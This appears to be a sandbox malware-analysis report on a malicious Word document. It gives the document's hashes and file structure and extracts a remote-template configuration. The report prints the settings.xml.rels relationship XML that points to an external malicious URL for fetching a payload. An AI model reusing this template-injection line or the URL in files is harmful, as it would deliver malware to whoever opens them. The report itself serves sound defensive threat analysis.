Malicious
Malicious

acaa49995bfa857288f0e2c72e7a1594

MS Word Document
|
MD5: acaa49995bfa857288f0e2c72e7a1594
|
Size: 186.58 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
acaa49995bfa857288f0e2c72e7a1594
Sha1
20ce211770246a879c9c9916c914095668b7a599
Sha256
10a73a0af103860ea72efa4daf143e4073445a0b64c80a81164caef4cb78aaa8
Sha384
6552ad68a15cbd58a74f3cc2342615b4e3f4f56e1a6a8bd8a8ab630c749bb2f801f0ed68427d3628f2fec30fed1be813
Sha512
930f98199b738b56bf16b63627575ecfd6829e28274593a2a879e7dce64cc7a871877a2f8f3965f928f9dcb52744b9c6f81d1b27e22fbd1dc0894935c699948d
SSDeep
3072:TLMc1jjgF2qCO0KSSXpjjgF2qCO0KSSXtRVvNeb5wgv0H8M/VYlZ8:lxjgYO0lQjgYO0lkO9wBB/mT8
TLSH
C3041220ACEC055DC1491EFDA66DB61C6CB867529F2754B0E82BB738CB2E9CF950114F
File Structure
acaa49995bfa857288f0e2c72e7a1594
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
header2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
header3.xml
endnotes.xml
header2.xml
embeddings
oleObject2.bin
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
#Stream {27}
#Stream {7}
#Stream {5}
#Stream {8}
#Stream {11}
#Stream {12}
Structure
theme
theme1.xml
media
image1.emf
settings.xml
fontTable.xml
styles.xml
webSettings.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Informations
Name
 Value
CONTENTS

1.6
CONTENTS

D:20241003125036+04'00'
CONTENTS

D:20241003125036+04'00'
CONTENTS

Oracle XML Publisher 5.6.3
CONTENTS

D:20241003125036+04'00'
CONTENTS

D:20241003125036+04'00'
CONTENTS

Oracle XML Publisher 5.6.3
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://greenthingstoworkonbestthingswithbetterguywhogivingbestthignsforuknow.dOTX@ct.rocks/v4RkCG
acaa49995bfa857288f0e2c72e7a1594 (186.58 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙